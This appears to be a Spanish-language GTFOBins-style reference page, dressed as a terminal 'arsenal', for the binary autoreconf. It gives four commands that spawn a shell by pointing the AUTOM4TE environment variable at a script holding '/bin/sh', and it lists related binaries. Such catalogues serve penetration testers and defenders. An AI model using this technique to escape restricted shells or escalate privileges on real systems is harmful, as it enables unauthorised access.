root@defcon-rd // ./arsenal/gtfobins/autoreconf
autoreconf
./autoreconf --examples
Funciones y ejemplos de uso
shell
echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
echo AC_INIT >configure.ac
AUTOM4TE=/path/to/temp-file autoreconf
./related --binary=autoreconf
Binarios relacionados
Comparten al menos una función con autoreconf.